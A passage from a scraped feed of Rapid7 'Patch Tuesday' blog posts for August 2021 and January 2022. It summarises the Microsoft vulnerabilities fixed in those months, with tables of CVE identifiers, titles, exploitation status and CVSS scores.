\n[CVE-2021-30597](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-30597>) | Chromium: CVE-2021-30597 Use after free in Browser UI | No | No | | Yes \n[CVE-2021-30596](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-30596>) | Chromium: CVE-2021-30596 Incorrect security UI in Navigation | No | No | | Yes \n[CVE-2021-30594](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-30594>) | Chromium: CVE-2021-30594 Use after free in Page Info UI | No | No | | Yes 
\n[CVE-2021-30593](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-30593>) | Chromium: CVE-2021-30593 Out of bounds read in Tab Strip | No | No | | Yes \n[CVE-2021-30592](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-30592>) | Chromium: CVE-2021-30592 Out of bounds write in Tab Groups | No | No | | Yes \n[CVE-2021-30591](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-30591>) | Chromium: CVE-2021-30591 Use after free in File System API | No | No | | Yes \n[CVE-2021-30590](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-30590>) | Chromium: CVE-2021-30590 Heap buffer overflow in Bookmarks | No | No | | Yes \n \n## Developer Tools Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-34532](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34532>) | ASP.NET Core and Visual Studio Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-34485](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34485>) | .NET Core and Visual Studio Information Disclosure Vulnerability | No | No | 5 | Yes \n[CVE-2021-26423](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26423>) | .NET Core and Visual Studio Denial of Service Vulnerability | No | No | 7.5 | No \n \n## Microsoft Dynamics Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-36946](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36946>) | Microsoft Dynamics Business Central Cross-site Scripting Vulnerability | No | No | 5.4 | No \n[CVE-2021-34524](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34524>) | Microsoft Dynamics 365 (on-premises) Remote Code Execution Vulnerability | No | No | 8.1 | No 
\n[CVE-2021-36950](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36950>) | Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability | No | No | 5.4 | No \n \n## Microsoft Office Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-36941](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36941>) | Microsoft Word Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-36940](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36940>) | Microsoft SharePoint Server Spoofing Vulnerability | No | No | 7.6 | No \n[CVE-2021-34478](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34478>) | Microsoft Office Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n \n## System Center Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-34471](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34471>) | Microsoft Windows Defender Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n \n## Windows Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-26426](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26426>) | Windows User Account Profile Picture Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-36948](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36948>) | Windows Update Medic Service Elevation of Privilege Vulnerability | Yes | No | 7.8 | No \n[CVE-2021-26432](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26432>) | Windows Services for NFS ONCRPC XDR Driver Remote Code Execution Vulnerability | No | No | 9.8 | No \n[CVE-2021-26433](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26433>) | Windows Services 
for NFS ONCRPC XDR Driver Information Disclosure Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-36926](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36926>) | Windows Services for NFS ONCRPC XDR Driver Information Disclosure Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-36932](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36932>) | Windows Services for NFS ONCRPC XDR Driver Information Disclosure Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-36933](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36933>) | Windows Services for NFS ONCRPC XDR Driver Information Disclosure Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-26431](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26431>) | Windows Recovery Environment Agent Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-34534](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34534>) | Windows MSHTML Platform Remote Code Execution Vulnerability | No | No | 6.8 | Yes \n[CVE-2021-34530](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34530>) | Windows Graphics Component Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-34486](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34486>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-34487](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34487>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-36938](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36938>) | Windows Cryptographic Primitives Library Information Disclosure Vulnerability | No | No | 5.5 | No \n[CVE-2021-36945](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36945>) | Windows 10 Update Assistant 
Elevation of Privilege Vulnerability | No | No | 7.3 | No \n[CVE-2021-34536](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34536>) | Storage Spaces Controller Elevation of Privilege Vulnerability | No | No | 7.8 | No \n \n## Windows ESU Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-34484](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34484>) | Windows User Profile Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26424](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26424>) | Windows TCP/IP Remote Code Execution Vulnerability | No | No | 9.9 | Yes \n[CVE-2021-36936](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36936>) | Windows Print Spooler Remote Code Execution Vulnerability | No | Yes | 8.8 | No \n[CVE-2021-36947](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36947>) | Windows Print Spooler Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-34483](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34483>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-36937](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36937>) | Windows Media MPEG-4 Video Decoder Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-36942](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36942>) | Windows LSA Spoofing Vulnerability | No | Yes | 7.5 | Yes \n[CVE-2021-34533](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34533>) | Windows Graphics Component Font Parsing Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-26425](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26425>) | Windows Event Tracing Elevation of 
Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-36927](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36927>) | Windows Digital TV Tuner device registration application Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-34537](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34537>) | Windows Bluetooth Driver Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-34480](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34480>) | Scripting Engine Memory Corruption Vulnerability | No | No | 6.8 | Yes \n[CVE-2021-34535](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34535>) | Remote Desktop Client Remote Code Execution Vulnerability | No | No | 8.8 | Yes", "cvss3": {}, "published": "2021-08-11T03:19:33", "type": "rapid7blog", "title": "Patch Tuesday - August 2021", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26423", "CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26428", "CVE-2021-26429", "CVE-2021-26430", "CVE-2021-26431", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-30590", "CVE-2021-30591", "CVE-2021-30592", "CVE-2021-30593", "CVE-2021-30594", "CVE-2021-30596", "CVE-2021-30597", "CVE-2021-33762", "CVE-2021-34471", "CVE-2021-34478", "CVE-2021-34480", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34485", "CVE-2021-34486", "CVE-2021-34487", "CVE-2021-34524", "CVE-2021-34530", "CVE-2021-34532", "CVE-2021-34533", "CVE-2021-34534", "CVE-2021-34535", "CVE-2021-34536", "CVE-2021-34537", "CVE-2021-36926", "CVE-2021-36927", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36934", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36938", "CVE-2021-36940", "CVE-2021-36941", "CVE-2021-36942", "CVE-2021-36943", "CVE-2021-36945", "CVE-2021-36946", "CVE-2021-36947", "CVE-2021-36948", "CVE-2021-36949", "CVE-2021-36950"], "modified": "2021-08-11T03:19:33", "id": 
"RAPID7BLOG:DE426F8A59CA497BB6C0B90C0F1849CD", "href": "https://blog.rapid7.com/2021/08/11/patch-tuesday-august-2021/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-18T23:27:22", "description": "\n\nThe first Patch Tuesday of 2022 sees Microsoft publishing fixes for over 120 CVEs across the bulk of their product line, including 29 previously patched CVEs affecting their Edge browser via Chromium. None of these have yet been seen exploited in the wild, though six were publicly disclosed prior to today. This includes two Remote Code Execution (RCE) vulnerabilities in open source libraries that are bundled with more recent versions of Windows: [CVE-2021-22947](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-22947>), which affects the curl library, and [CVE-2021-36976](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36976>) which affects libarchive.\n\nThe majority of this month\u2019s patched vulnerabilities, such as [CVE-2022-21857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21857>) (affecting Active Directory Domain Services), allow attackers to elevate their privileges on systems or networks they already have a foothold in. \n\n### Critical RCEs\n\nBesides [CVE-2021-22947](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-22947>) (libcurl), several other Critical RCE vulnerabilities were also fixed. Most of these have caveats that reduce their scariness to some degree. The worst of these is [CVE-2021-21907](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21907>), affecting the Windows HTTP protocol stack. 
Although it carries a CVSSv3 base score of 9.8 and is considered potentially \u201cwormable\u201d by Microsoft, similar vulnerabilities have not proven to be rampantly exploited (see the AttackerKB analysis for [CVE-2021-31166](<https://attackerkb.com/topics/pZcouFxeCW/cve-2021-31166/rapid7-analysis>)).\n\nNot quite as bad is [CVE-2022-21840](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21840>), which affects all supported versions of Office, as well as Sharepoint Server. Exploitation would require social engineering to entice a victim to open an attachment or visit a malicious website \u2013 thankfully the Windows preview pane is not a vector for this attack.\n\n[CVE-2022-21846](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21846>) affects Exchange Server, but cannot be exploited directly over the public internet (attackers need to be \u201cadjacent\u201d to the target system in terms of network topology). This restriction also applies to [CVE-2022-21855](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21855>) and [CVE-2022-21969](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21969>), two less severe RCEs in Exchange this month.\n\n[CVE-2022-21912](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21912>) and [CVE-2022-21898](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21898>) both affect DirectX Graphics and require local access. [CVE-2022-21917](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21917>) is a vulnerability in the Windows Codecs library. 
In most cases, systems should automatically get patched; however, some organizations may have the vulnerable codec preinstalled on their gold images and disable Windows Store updates.\n\nDefenders should prioritize patching servers (Exchange, Sharepoint, Hyper-V, and IIS) followed by web browsers and other client software.\n\n## Summary charts\n\n\n\n## Summary tables\n\n### Browser vulnerabilities\n\nCVE | Title | Exploited | Publicly disclosed | CVSSv3 base | Additional FAQ \n---|---|---|---|---|--- \n[CVE-2022-21930](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21930>) | Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability | No | No | 4.2 | Yes \n[CVE-2022-21931](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21931>) | Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability | No | No | 4.2 | Yes \n[CVE-2022-21929](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21929>) | Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability | No | No | 2.5 | Yes \n[CVE-2022-21954](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21954>) | Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability | No | No | 6.1 | Yes \n[CVE-2022-21970](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21970>) | Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability | No | No | 6.1 | Yes \n[CVE-2022-0120](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0120>) | Chromium: CVE-2022-0120 Inappropriate implementation in Passwords | No | No | nan | Yes \n[CVE-2022-0118](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0118>) | Chromium: CVE-2022-0118 Inappropriate implementation in WebShare | No | No | nan | Yes \n[CVE-2022-0117](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0117>) | Chromium: CVE-2022-0117 
Policy bypass in Service Workers | No | No | nan | Yes \n[CVE-2022-0116](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0116>) | Chromium: CVE-2022-0116 Inappropriate implementation in Compositing | No | No | nan | Yes \n[CVE-2022-0115](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0115>) | Chromium: CVE-2022-0115 Uninitialized Use in File API | No | No | nan | Yes \n[CVE-2022-0114](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0114>) | Chromium: CVE-2022-0114 Out of bounds memory access in Web Serial | No | No | nan | Yes \n[CVE-2022-0113](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0113>) | Chromium: CVE-2022-0113 Inappropriate implementation in Blink | No | No | nan | Yes \n[CVE-2022-0112](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0112>) | Chromium: CVE-2022-0112 Incorrect security UI in Browser UI | No | No | nan | Yes \n[CVE-2022-0111](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0111>) | Chromium: CVE-2022-0111 Inappropriate implementation in Navigation | No | No | nan | Yes \n[CVE-2022-0110](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0110>) | Chromium: CVE-2022-0110 Incorrect security UI in Autofill | No | No | nan | Yes \n[CVE-2022-0109](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0109>) | Chromium: CVE-2022-0109 Inappropriate implementation in Autofill | No | No | nan | Yes \n[CVE-2022-0108](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0108>) | Chromium: CVE-2022-0108 Inappropriate implementation in Navigation | No | No | nan | Yes \n[CVE-2022-0107](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0107>) | Chromium: CVE-2022-0107 Use after free in File Manager API | No | No | nan | Yes 
\n[CVE-2022-0106](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0106>) | Chromium: CVE-2022-0106 Use after free in Autofill | No | No | nan | Yes \n[CVE-2022-0105](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0105>) | Chromium: CVE-2022-0105 Use after free in PDF | No | No | nan | Yes \n[CVE-2022-0104](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0104>) | Chromium: CVE-2022-0104 Heap buffer overflow in ANGLE | No | No | nan | Yes \n[CVE-2022-0103](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0103>) | Chromium: CVE-2022-0103 Use after free in SwiftShader | No | No | nan | Yes \n[CVE-2022-0102](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0102>) | Chromium: CVE-2022-0102 Type Confusion in V8 | No | No | nan | Yes \n[CVE-2022-0101](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0101>) | Chromium: CVE-2022-0101 Heap buffer overflow in Bookmarks | No | No | nan | Yes \n[CVE-2022-0100](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0100>) | Chromium: CVE-2022-0100 Heap buffer overflow in Media streams API | No | No | nan | Yes \n[CVE-2022-0099](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0099>) | Chromium: CVE-2022-0099 Use after free in Sign-in | No | No | nan | Yes \n[CVE-2022-0098](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0098>) | Chromium: CVE-2022-0098 Use after free in Screen Capture | No | No | nan | Yes \n[CVE-2022-0097](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0097>) | Chromium: CVE-2022-0097 Inappropriate implementation in DevTools | No | No | nan | Yes \n[CVE-2022-0096](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-0096>) | Chromium: CVE-2022-0096 Use after free in Storage | No | No | nan | Yes \n \n### 
Developer Tools vulnerabilities\n\nCVE | Title | Exploited | Publicly disclosed | CVSSv3 base | Additional FAQ \n---|---|---|---|---|--- \n[CVE-2022-21911](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21911>) | .NET Framework Denial of Service Vulnerability | No | No | 7.5 | No \n \n### ESU Windows vulnerabilities\n\nCVE | Title | Exploited | Publicly disclosed | CVSSv3 base | Additional FAQ \n---|---|---|---|---|--- \n[CVE-2022-21924](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21924>) | Workstation Service Remote Protocol Security Feature Bypass Vulnerability | No | No | 5.3 | No \n[CVE-2022-21834](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21834>) | Windows User-mode Driver Framework Reflector Driver Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21919](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21919>) | Windows User Profile Service Elevation of Privilege Vulnerability | No | Yes | 7 | No \n[CVE-2022-21885](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21885>) | Windows Remote Access Connection Manager Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-21914](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21914>) | Windows Remote Access Connection Manager Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-21920](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21920>) | Windows Kerberos Elevation of Privilege Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-21908](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21908>) | Windows Installer Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-21843](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21843>) | Windows IKE Extension Denial of Service Vulnerability | No 
| No | 7.5 | Yes \n[CVE-2022-21883](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21883>) | Windows IKE Extension Denial of Service Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-21848](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21848>) | Windows IKE Extension Denial of Service Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-21889](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21889>) | Windows IKE Extension Denial of Service Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-21890](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21890>) | Windows IKE Extension Denial of Service Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-21900](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21900>) | Windows Hyper-V Security Feature Bypass Vulnerability | No | No | 4.6 | Yes \n[CVE-2022-21905](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21905>) | Windows Hyper-V Security Feature Bypass Vulnerability | No | No | 4.6 | Yes \n[CVE-2022-21880](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21880>) | Windows GDI+ Information Disclosure Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-21915](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21915>) | Windows GDI+ Information Disclosure Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-21904](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21904>) | Windows GDI Information Disclosure Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-21903](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21903>) | Windows GDI Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21899](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21899>) | Windows Extensible Firmware Interface Security Feature Bypass Vulnerability | 
No | No | 5.5 | No \n[CVE-2022-21916](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21916>) | Windows Common Log File System Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-21897](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21897>) | Windows Common Log File System Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-21838](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21838>) | Windows Cleanup Manager Elevation of Privilege Vulnerability | No | No | 5.5 | Yes \n[CVE-2022-21836](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21836>) | Windows Certificate Spoofing Vulnerability | No | Yes | 7.8 | Yes \n[CVE-2022-21925](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21925>) | Windows BackupKey Remote Protocol Security Feature Bypass Vulnerability | No | No | 5.3 | No \n[CVE-2022-21862](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21862>) | Windows Application Model Core API Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21859](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21859>) | Windows Accounts Control Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21833](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21833>) | Virtual Machine IDE Drive Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-21922](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21922>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-21893](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21893>) | Remote Desktop Protocol Remote Code Execution Vulnerability | No | No | 8.8 | Yes 
\n[CVE-2022-21850](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21850>) | Remote Desktop Client Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-21851](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21851>) | Remote Desktop Client Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-21835](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21835>) | Microsoft Cryptographic Services Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-21884](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21884>) | Local Security Authority Subsystem Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-21913](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21913>) | Local Security Authority (Domain Policy) Remote Protocol Security Feature Bypass | No | No | 5.3 | No \n[CVE-2022-21857](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21857>) | Active Directory Domain Services Elevation of Privilege Vulnerability | No | No | 8.8 | Yes \n \n### Exchange Server vulnerabilities\n\nCVE | Title | Exploited | Publicly disclosed | CVSSv3 base | Additional FAQ \n---|---|---|---|---|--- \n[CVE-2022-21846](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21846>) | Microsoft Exchange Server Remote Code Execution Vulnerability | No | No | 9 | Yes \n[CVE-2022-21855](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21855>) | Microsoft Exchange Server Remote Code Execution Vulnerability | No | No | 9 | Yes \n[CVE-2022-21969](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21969>) | Microsoft Exchange Server Remote Code Execution Vulnerability | No | No | 9 | Yes \n \n### Microsoft Dynamics vulnerabilities\n\nCVE | Title | Exploited | Publicly disclosed | CVSSv3 base | 
Additional FAQ \n---|---|---|---|---|--- \n[CVE-2022-21932](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21932>) | Microsoft Dynamics 365 Customer Engagement Cross-Site Scripting Vulnerability | No | No | 7.6 | No \n[CVE-2022-21891](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21891>) | Microsoft Dynamics 365 (on-premises) Spoofing Vulnerability | No | No | 7.6 | No \n \n### Microsoft Office vulnerabilities\n\nCVE | Title | Exploited | Publicly disclosed | CVSSv3 base | Additional FAQ \n---|---|---|---|---|--- \n[CVE-2022-21842](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21842>) | Microsoft Word Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-21837](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21837>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 8.3 | Yes \n[CVE-2022-21840](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21840>) | Microsoft Office Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-21841](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21841>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n \n### Windows vulnerabilities\n\nCVE | Title | Exploited | Publicly disclosed | CVSSv3 base | Additional FAQ \n---|---|---|---|---|--- \n[CVE-2022-21895](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21895>) | Windows User Profile Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-21864](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21864>) | Windows UI Immersive Server API Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21866](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21866>) | Windows System Launcher Elevation of Privilege 
